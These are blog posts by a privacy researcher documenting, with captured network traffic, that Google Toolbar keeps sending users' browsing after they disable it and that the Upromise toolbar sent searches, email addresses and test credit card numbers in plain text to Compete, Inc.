Certain Google Toolbar features require transmitting to Google servers the full URLs users browse. For example, to tell users the PageRank of the pages they browse, the Google Toolbar must send Google servers the URL of each such page. Google Toolbar’s “Related Sites” and “Sidewiki” (user comments) features also require similar transmissions.
With a network monitor, I confirmed that these transmissions include the full URLs users visit – including domain names, directories, filenames, URL parameters, and search terms. For example, I observed the transmission below when I searched Yahoo (green highlighting) for "laptops" (yellow).
GET /search?client=navclient-auto&swwk=358&iqrn=zuk&orig=0gs08&ie=UTF-8&oe=UTF-8&querytime=kV&querytimec=kV &features=Rank:SW:&q=info:http%3a%2f%2frds.yahoo.com%2f_ylt%3dA0oGkl32p1tLT2EB8ohXNyoA%2fSIG%3d18045klhr%2f
EXP%3d1264384374%2f**http%253a%2f%2fsearch.yahoo.com%2fsearch%253fp%3dlaptops%2526fr%3dsfp%2526xargs%3d12KP
jg1itSroGmmvmnEOOIMLrcmUsOkZ7Fo5h7DOV5CtdY6hNdE%25252DIfXpP0xZg6WO8T7xvSy7HBreVFdJGu277WVk0qfeG%25255FGOW%2
5255F772GnNVme5ujWkF3s%25252DJ%25255F0%25252Dmdn4RvDE8%25252E%2526pstart%3d7%2526b%3d11&googleip=O;72.14.20
4.104;226&ch=711984234986 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 6.4.1208.1530; Windows XP 5.1; MSIE 8.0.6001.18702)
Accept-Language: en
Host: toolbarqueries.google.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PREF=ID=…
HTTP/1.1 200 OK …
Screenshots – Google Toolbar Continues Tracking Browsing Even When Users "Disable" the Toolbar via Its "X" Button
Consistent with modern browser plug-in standards, the current Google Toolbar features an “X” button to disable the toolbar:
I clicked the “X” and received a confirmation window:
I chose the top option and pressed OK. The Google Toolbar disappeared from view, indicating that it was disabled for this window, just as I had requested. Within the same window, I requested the Whitehouse.gov site:
Although I had asked that the Google Toolbar be "disable[d] … for this window " and although the Google Toolbar disappeared from view, my network monitor revealed that Google Toolbar continued to transmit my browsing to its toolbarqueries.google.com server:
See also a screen-capture video memorializing these transmissions.
These Nonconsensual Transmissions Affect Important, Routine Scenarios (added 1/26/10, 12:15pm)
In a statement to Search Engine Land, Google argued that the problems I reported are "only an issue until a user restarts the browser." I emphatically disagree.
Consider the nonconsensual transmission detailed in the preceding section: A user presses "x", is asked "When do you want to disable Google Toolbar and its features?", and chooses the default option, to "Disable Google Toolbar only for this window." The entire purpose of this option is to take effect immediately. Indeed, it would be nonsense for this option to take effect only upon a browser restart: Once the user restarts the browser, the "for this window" disabling is supposed to end, and transmissions are supposed to resume. So Google Toolbar transmits web browsing before the restart, and after the restart too. I stand by my conclusion: The "Disable Google Toolbar only for this window" option doesn’t work at all: It does not actually disable Google Toolbar for the specified window, not immediately and not upon a restart.
Crucially, these nonconsensual transmissions target users who are specifically concerned about privacy. A user who requests that Google Toolbar be disabled for the current window is exactly seeking to do something sensitive, confidential, or embarrassing, or in any event something he does not wish to record in Google’s logs. This privacy-conscious user deserves extra privacy protection. Yet Google nonetheless records his browsing. Google fails this user — specifically and unambiguously promising to immediately stop tracking when the user so instructs, but in fact continuing tracking unabated.
Google Toolbar Continues Tracking Browsing Even When Users "Disable" the Toolbar via "Manage Add-Ons"
Internet Explorer 8 includes a Manage Add-Ons screen to disable unwanted add-ons. On a PC with Google Toolbar, I activated Manage Add-Ons, clicked the Google Toolbar entry, and chose Disable. I accepted all defaults and closed the dialog box.
Again I requested the whitehouse.gov site. Again my network monitor revealed that Google Toolbar continued to transmit my browsing to its toolbarqueries.google.com server. Indeed, as I requested various pages on the whitehouse.gov site, Google Toolbar transmitted the full URLs of those pages, as shown in the second and third circles below.
See also a screen-capture video memorializing these transmissions.
In a further test, performed January 23, I reconfirmed the observations detailed here. In that test, I demonstrated that even checking the "Google Toolbar Notifier BHO" box and disabling that component does not impede these Google Toolbar transmissions. I also specififically confirmed that these continuing Google Toolbar transmissions track users’ searches at competing search engines. See screen-capture video.
In my tests, in this Manage Add-Ons scenario, Google Toolbar transmissions cease upon the next browser restart. But no on-screen message alerts the user to the need for a browser-restart for changes to take effect, so the user has no reason to think a restart is required.
Google Toolbar Continues Tracking Browsing When Users "Disable" the Toolbar via Right Click (added 1/26/10 11:00pm)
Danny Sullivan asked me whether Google Toolbar continues Enhanced Features transmissions if users hide Google Toolbar via IE’s right-click menu. In a further test, I confirmed that Google Toolbar transmissions continue in these circumstances. Below are the four key screenshots: 1) I right-click in empty toolbar space, and I uncheck Google Toolbar. 2) I check the final checkbox and choose Disable. 3) Google Toolbar disappears from view and appears to be disabled. I browse the web. 4) I confirm that Google Toolbar’s transmissions nonetheless continue. See also a screen-capture video.
Users May Easily or Accidentally Activate “Enhanced Features” Transmissions
The above-described transmissions occur only if a user runs Google Toolbar in its “Enhanced Features” mode. But it is strikingly easy for a user to stumble into this mode.
For one, the standard Google Toolbar installation encourages users to activate Enhanced Features via a “bubble” message shown at the conclusion of installation. See the screenshot at right. This bubble presents a forceful request for users to activate Sidewiki: The feature is described as “enhanced” and “helpful”, and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus – so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation.
I credit that the bubble mentions the important privacy consequence of enabling Enhanced Features: “For enhanced features to work, Toolbar has to tell us what site you’re visiting by sending Google the URL.” But this disclosure falls importantly short. For one, Enhanced Features transmits not just “sites” but specific full URLs, including directories, filenames, URL parameters, and search keywords. Indeed, Google’s bubble statement is internally-inconsistent – indicating transmissions of “sites” and “URLs” as if those are the same thing, when in fact the latter is far more intrusive than the former, and the latter is accurate.
The bubble also falls short in its presentation of Google Toolbar’s Privacy Policy. If a user clicks the Privacy Policy hyperlink, the user receives the image shown in the left image below. Notice that the Privacy Policy loads in an unusual window with no browser chrome – no Edit-Find option to let a user search for words of particular interest, no Edit-Select All and Edit-Copy option to let a user copy text to another program for further review, no Save or Print options to let a user preserve the file. Had Google used a standard browser window, all these features would have been available, but by designing this nonstandard window, Google creates all these limitations. The substance of the document is also inapt. For one, “Enhanced Toolbar Features” receive no mention whatsoever until the fifth on-screen page (right image below). Even there, the first bullet describes transmission of “the addresses [of] the sites” users visit – again falsely indicating transmission of mere domain names, not full URLs. The second bullet mentions transmission of “URL[s]” but says such transmission occurs “[w]hen you use Sidewiki to write, edit, or rate an entry.” Taken together, these two bullets falsely indicate that URLs are transmitted only when users interact with Sidewiki, and that only sites are transmitted otherwise, when in fact URLs are transmitted whenever Enhanced Features are turned on.
Certain bundled installations make it even easier for users to get Google Toolbar unrequested, and to end up with Enhanced Features too. With dozens of Google Toolbar partners, using varying installation tactics, a full review of their practices is beyond the scope of this article. But they provide significant additional cause for concern.
Enhanced Features: Easy to Enable, Hard to Turn Off
The preceding sections shows that users can enable Google Toolbar’s Enhanced Features with a single click on a prominent, oversized button. But disabling Enhanced Features is much harder.
Consider a user who changes her mind about Enhanced Features but wishes to keep Google Toolbar in its basic mode. How exactly can she do so? Browsing the Google Toolbar’s entire Options screen, I found no option to disable Enhanced Features. Indeed, Enhanced Features are easily enabled with a single click, during installation (as shown above) or thereafter. But disabling Enhanced Features seems to require uninstalling Google Toolbar altogether, and in any event disabling Enhanced Features certainly lacks any comparably-quick command.
I’m reminded of The Eagles’ Hotel California: "you can check out anytime you like, but you can never leave." And of course, as discussed above, a user who chooses the X button or Manage Add-Ons, will naturally believe the Google Toolbar is disabled, when in fact it continues transmissions unabated.
Google Toolbar Disclosures Have Worsened Over Time
I first wrote about Google Toolbar’s installation and privacy disclosures in my March 2004 FTC comments on spyware and adware. In that document, I praised Google’s then-current toolbar installation sequence, which featured the impressive screen shown at right.
I praised this screen with the following discussion:
I consider this disclosure particularly laudable because it features the following characteristics: It discusses privacy concerns on a screen dedicated to this topic, separate from unrelated information and separate from information that may be of lesser concern to users. It uses color and layout to signal the importance of the information presented. It uses plain language, simple sentences, and brief paragraphs. It offers the user an opportunity to opt out of the transmission of sensitive information, without losing any more functionality than necessary (given design constraints), and without suffering penalties of any kind (e.g. forfeiture of use of some unrelated software). As a result of these characteristics, users viewing this screen have the opportunity to make a meaningful, informed choice as to whether or not to enable the Enhanced Features of the Google Toolbar.
I stand by that praise. But six years later, Google Toolbar’s installation sequence is inferior in every way:
- Now, initial Enhanced Features privacy disclosures appear not in their own screen, but in a bubble pitching another feature (Sidewiki). Previously, format (all-caps, top-of-page), color (red) and language ("… not the usual yada yada") alerted users to the seriousness of the decision at hand.
- Now, Google presents Enhanced Features as a default with an oversized button, bold type, and acceptance via a single keystroke. Previously, neither option was a default, and both options were presented with equal prominence.
- Now, privacy statements are imprecise and internally-inconsistent, muddling the concepts of site and URL. Previous disclosures were clear in explaining that acceptance entails "sending us [Google] the URL" of each page a user visits.
- The current feature name, "Enhanced Features," is less forthright than the prior "Advanced Features" label. The name "Advanced Features" appropriately indicated that the feature is not appropriate for all users (but is intended for, e.g., "advanced" users). In contrast, the current "Enhanced Features" name suggests that the feature is an "enhancement" suitable for everyone.
Google’s Undisclosed Taskbar Button
The Google Toolbar also added a “Google” button to my Taskbar, immediately adjacent to the Start button. The Toolbar installer added this button without any disclosure whatsoever in the installation sequence – not on the toolbar.google.com web page, not in the installer EXE, not anywhere else.
An in-Taskbar button is not consistent with ordinary functions users reasonably expect when they seek and install a “toolbar.” Because this function arrives on a user’s computer without notice and without consent, it is an improper intrusion.
Google’s first step is simple: Fix the Toolbar so that X and Manage Add-Ons in fact do what they promise. When a user disables Google Toolbar, all Enhanced Features transmissions need to stop, immediately and without exception. This change must be deployed to all Google Toolbar users straightaway.
Google also needs to clean up the results of its nonconsensual data collection. In particular, Google has collected browsing data from users who specifically declined to allow such data to be collected. In some instances this data may be private, sensitive, or embarrassing: Savvy users would naturally choose to disable Google Toolbar before their most sensitive searches. Google ordinarily doesn’t let users delete their records as stored on Google servers. But these records never should have been sent to Google in the first place. So Google should find a way to let concerned users request that Google fully and irreversibly delete their entire Toolbar histories.
Even when Google fixes these nonconsensual transmissions, larger problems remain. The current Toolbar installation sequence suffers inconsistent statements of privacy consequences, with poor presentation of the full Toolbar Privacy Statement. Toolbar adds a button to users’ Taskbar unrequested. And as my videos show, once Google puts its code on a user’s computer, there’s nothing to stop Google from tracking users even after users specifically decline. I’ve run Google Toolbar for nearly a decade, but this week I uninstalled Google Toolbar from all my PCs. I encourage others to do the same.
Upromise Savings — At What Cost? updated January 25, 2010
Upromise touts opportunities for college savings. When members shop at participating online merchants, dine at participating restaurants, or purchase selected products at retail stores, Upromise collects commissions which fund college savings accounts.
Unfortunately, the Upromise Toolbar also tracks users’ behavior in excruciating detail. In my testing, when a user checked an innocuously-labeled box promising "Personalized Offers," the Upromise Toolbar tracked and transmitted my every page-view, every search, and every click, along with many entries into web forms. Remarkably, these transmissions included full credit card numbers — grabbed out of merchants’ HTTPS (SSL) secure communications, yet transmitted by Upromise in plain text, readable by anyone using a network monitor or other recording system.
Proof of the Specific Transmissions
I began by running a search at Google. The Upromise toolbar transmissions reported the full URL I requested, including my search provider (yellow) and my full search keywords (green).
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 274
Connection: Keep-Alive
md5=ee593c14f70c1b7f8b3341a91c3e3639&ts=1264045792.140&bua=N%2FA&meth=get&eid=300&fid=NULL&bin=24af1f0
&refererHeader=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F&url=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3D
en%26source%3Dhp%26q%3Di%2Bfeel%2Bsick%26aq%3Df%26aql%26aqi%3Dg10%26oq
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 03:49:51 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>ee593c14f70c1b7f8b3341a91c3e3639</md5>
<version>1.0</version>
</capture>
I clicked a result — a page on Wikipedia. Transmissions included the full URL of my request (blue) as well as the web search provider (yellow) and keywords (green) that had referred me (red) to this site.
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 304
Connection: Keep-Alive
md5=ee7e3174db149d0d97f51b10db9ac58d&ts=1264045931.921&bua=N%2FA&meth=get&eid=300&fid=NULL&bin=24af1f0
&refererHeader=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26source%3Dhp%26q%3Di%2Bfeel%2Bsick%
26aq%3Df%26aql%3D%26aqi%3Dg10%26oq%3D&url=http%3A%2F%2Fen%2Ewikipedia%2Eorg%2Fwiki%2FI%5FFeel%5FSick
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 03:52:11 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>ee7e3174db149d0d97f51b10db9ac58d</md5>
<version>1.0</version>
</capture>
I browsed onwards to Buy.com (grey), where I added an item to my shopping cart and proceeded to checkout. When prompted, I entered a (made-up) credit card number. Buy.com appropriately secured the card number with HTTPS encryption. But, remarkably, Upromise extracted and transmitted the full sixteen-digit card number (yellow) — as well as my (also fictitious) CVV code (green), and expiration date (blue).
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 1936
Connection: Keep-Alive
md5=352732ac9ee0d9e970f3c65d62ed03b1&ts=1264046115.702&bua=N%2FA&meth=post&eid=300&fid=NULL&bin=24af1f0
&refererHeader=https%3A%2F%2Fssl%2Ebuy%2Ecom%2FCO%2FCheckout%2FpaymentOptions%2Easpx&url=https%3A%2F%2F
ssl%2Ebuy%2Ecom%2FCO%2FCheckout%2FpaymentOptions%2Easpx%3F%5F%5FEVENTTARGET%26%5F%5FEVENTARGUMENT%26%5F
%5FVIEWSTATE%3D%2FwEPDwUKMTQ1MjY3MzM2Mw9kFgQCAw9kFgQCAQ8PFgIeCEltYWdlVXJsBV1odHRwczovL2EyNDguZS5ha2FtYW
kubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1eS5jb20vYnV5X2Fzc2V0cy92Ni9oZWFkZXIvMjAwNi9idXlfbG9nby5naWZkZAICD
w8WAh8ABXdodHRwczovL2EyNDguZS5ha2FtYWkubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1eS5jb20vYnV5X2Fzc2V0cy92Ni9j
b3JwL2NoZWNrb3V0X3Byb2Nlc3MvY2hlY2tvdXRfM19wYXltZW50X2dyZWVuLmdpZmRkAgUPZBYQAgUPZBYCZg9kFgRmDw8WBB8ABVN
odHRwczovL2EyNDguZS5ha2FtYWkubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1eS5jb20vYnV5X2Fzc2V0cy9jcy9pbWFnZXMvYm
1sLmdpZh4HVmlzaWJsZWdkZAIBDw8WAh8ABWNodHRwczovL2EyNDguZS5ha2FtYWkubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1e
S5jb20vYnV5X2Fzc2V0cy9idXR0b25zLzIwMDgvYnV0dG9uX2NvbnRpbnVlMi5naWZkZAIHD2QWAmYPZBYKAgUPEA9kFgIeB29uY2xp
Y2sFKFNldFVuaXF1ZVJhZGlvQnV0dG9uKCdyZG9QYXltZW50cycsdGhpcylkZGQCBw8QD2QWAh4Ib25DaGFuZ2UFG2phdmFzY3JpcHQ
6c2hvd0hpZGVDQyh0aGlzKWRkZAIJDw9kFgIfAgUfc3dpdGNoUmFkaW8oJ3Jkb05ld0NyZWRpdENhcmQnKWQCDQ8QZA8WDWYCAQICAg
MCBAIFAgYCBwIIAgkCCgILAgwWDRAFBDIwMTAFBDIwMTBnEAUEMjAxMQUEMjAxMWcQBQQyMDEyBQQyMDEyZxAFBD%2A%2A%2A%2A%7B
1422%7D%26%5F%5FEVENTVALIDATION%3D%2FwEWKQLNvonpCgKYm5r9BALB5eOPBALy2ZqvCQLv2ZqvCQLq2ZqvCQLu2ZqvCQLr2ba
vCQL28Nu2CwLDqZ7xDALDqZrxDALDqabxDALDqaLxDALDqa7xDALDqarxDALDqbbxDALDqfLyDALDqf7yDALcqZLxDALcqZ7xDALcqZ
rxDALrtZj9AgLrtaSgCQLrtbAHAuu13OoIAuu16NEPAuu19LQGAuu1gJgNAuu1rP8FAuu1%2BJcHAuu1hPsPAvai%2BtMMAvaihrcDA
vaikpoKAt7CxckKAsqi76gMAva5sdkEAvLqvYoEAoaI4c0FArr3pYIHApibrtgNijCSRDzGArpVaF4m3bbOLp8yvUM%3D%26rdoPaym
ents%3DrdoNewCreditCard%26lstCCType%3D9%26txtNewCCNumber%3D4412124112341234%26lstNewCCMonth%3D01%26lstN
ewCCYear%3D2010%26txtNewCVV2%3D222%26btnContinue2%2Ex%3D18%26btnContinue2%2Ey%3D19
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 03:55:15 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>352732ac9ee0d9e970f3c65d62ed03b1</md5>
<version>1.0</version>
</capture>
Upromise also transmitted my email address. For example, when I logged into Restaurant.com, Upromise’s transmission included my email (yellow):
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 378
Connection: Keep-Alive
md5=26830cfab132bb3122fcf40d8cd0f2f9&ts=1264049936.327&bua=N%2FA&meth=post&eid=303&fid=NULL&bin=24af1f0
&refererHeader=&url=https%3A%2F%2Fwww%2Erestaurant%2Ecom%2Fregister%2Dlogin%2Easp%3Fpurchasestatus%3DRE
GISTER%2DLOGIN%26hdnButton%3DSignin%26txtMemberSignin%3Dedelman%40pobox%2Ecom%26radio%5Fcust%3Dcustomer
%5Fexisting%26txtMemberPassword…
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 04:58:56 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>26830cfab132bb3122fcf40d8cd0f2f9</md5>
<version>1.0</version>
</capture>
All the preceding transmission were made over my ordinary Internet connection just as shown above. In particular, these transmissions were sent in plain text — without encryption or encoding of any kind. Any computer with a network monitor (including, for users connected by Wi-Fi, any nearby wireless user) could easily read these communications. With no additional hardware or software, a nearby listener could thereby obtain, e.g., users’ full credit card numbers — even though merchants used HTTPS security to attempt to keep those numbers confidential.
The Destination of Upromise’s Transmissions: Compete, Inc.
As shown in the "host:" header of each of the preceding communications, transmissions flow to the consumerinput.com domain. Whois reports that this domain is registered to Boston, MA traffic-monitoring service Compete, Inc. Compete’s site promises clients access to "detailed behavioral data," and Compete says more than 2 million U.S. Internet users "have given [Compete] permission to analyze the web pages they visit."
Upromise’s Disclosures Misrepresent Data Collection and Fail to Obtain Consumer Consent
Upromise’s installation sequence does not obtain users’ permission for this detailed and intrusive tracking. Quite the contrary: Numerous Upromise screens discuss privacy, and they all fail to mention the detailed information Upromise actually transmits.
The Upromise toolbar installation page touts the toolbar’s purported benefits at length, but mentions no privacy implications whatsoever.
If a user clicks the prominent button to begin the toolbar installation, the next screen presents a 1,354-word license agreement that fills 22 on-screen pages and offers no mechanism to enlarge, maximize, print, save, or search the lengthy text. But even if a user did read the license, the user would receive no notice of detailed tracking. Meanwhile, the lower on-screen box describes a "Personalized Offers" feature, which is labeled as causing "information about [a user’s] online activity [to be] collected and used to provide college savings opportunities" But that screen nowhere admits collecting users’ email addresses or credit card numbers. Nor would a user rightly expect that "information about … online activity" means a full log of every search and every page-view across the entire web.
The install sequence does link to Upromise’s privacy policy. But this page also fails to admit the detailed tracking Upromise performs. Indeed, the privacy policy promises that Personalized Offers data collection will be "anonymous" — when in fact the transmissions include email addresses and credit card numbers. The privacy policy then claims that any collection of personal information is "inadvertent" and that such information is collected only "potentially." But I found that the information transmissions described above were standard and ongoing.
The privacy policy also limits Upromise’s sharing of information with third parties, claiming that such sharing will include only "non-personally identifiable data." But I found that Upromise was sharing highly sensitive personal information, including email addresses and credit card numbers.
In addition, Upromise’s data transmissions contradict representation in Upromise’s FAQ. The top entry in the FAQ promises that Upromise "has implemented security systems designed to keep [users’] information safe." But transmitting credit card numbers in cleartext is reckless and ill-advised — specifically contrary to standard Payment Card Industry (PCI) rules, and the opposite of "safe." Indeed, in an ironic twist, Upromise’s FAQ goes on to discuss at great length the benefits of SSL encryption — benefits of course lacking when Upromise transmits users’ credit card numbers without such encryption.
The Upromise toolbar offers an Options screen which again makes no mention of key data transmissions. The screen admits collecting "information about the web sites you visit." But it says nothing of collecting email addresses, credit card numbers, and more.
The transmissions at issue affect only those users who agree to run Upromise’s Personalized Offers system. But until last week, that option was set as the default upon new Upromise toolbar installations — inviting users to initiate these transmissions without a second look.
Even if Upromise ceased the most outrageous transmissions detailed above, Upromise’s installation disclosures would still give ample basis for concern. To describe tracking, transmitting, and analyzing a user’s every page-view and every search, Upromise’s install screen euphemistically mentions that its "service provider may use non-personally identifiable information about your online activity." This admission appears below a lengthy EULA, under a heading irrelevantly labeled "Personalized Offers" — doing little to draw users’ attention to the serious implications of Personalized Offers. I don’t see why Upromise users would ever want to accept this detailed tracking: It’s entirely unrelated to the college savings that draws users to the Upromise site. But if Upromise is to keep this function, users deserve a clear, precise, and well-labeled statement of exactly what they’re getting into.
Upromise’s multi-faceted business raises other concerns that also deserve a critical look. The implications for affiliate merchants are particularly serious — a risk of paying affiliate commission for users already at a merchant’s site. But I’ll save this subject for another day.
Upromise’s Response (posted: January 23, 2010)
Upromise told PC Magazine’s Larry Seltzer that less than 2% of their 12 million members were affected. Though 2% of 12 million is 240,000 — a lot!
Upromise staff also wrote to me. I replied with a few questions:
1) How long was the problem in effect?
2) How many users were affected?
3) What caused the problem?
4) I notice that the Upromise toolbar EULA has numerous firmly-worded defensive provisions. (See the entire sections captioned “Disclaimer of Warranty” and “Limitation of Liability” – purporting to disclaim responsibility for a wide variety of problems. And then see Governing Law and Arbitration for a purported limitation on what law governs and how claims may be brought.) For consumers who believe they suffered losses or harms as a result of this problem, will Upromise invoke the defensive provisions in its EULA to attempt to avoid or limit liability?
I’m particularly interested in the answer to the final question. The EULA is awfully one-sided. I appreciate Upromise confirming the serious failure I uncovered. Upromise should also accept whatever legal liability goes with this breach.
Upromise’s Response to My Questions (posted: January 25, 2010)
Upromise replied to my four questions to indicate that the scope of the problem was "approximately 1% of our 12 million members." Upromise did not answer my questions about the duration of the problem, the cause of the problem, or the effect of Upromise’s EULA defenses.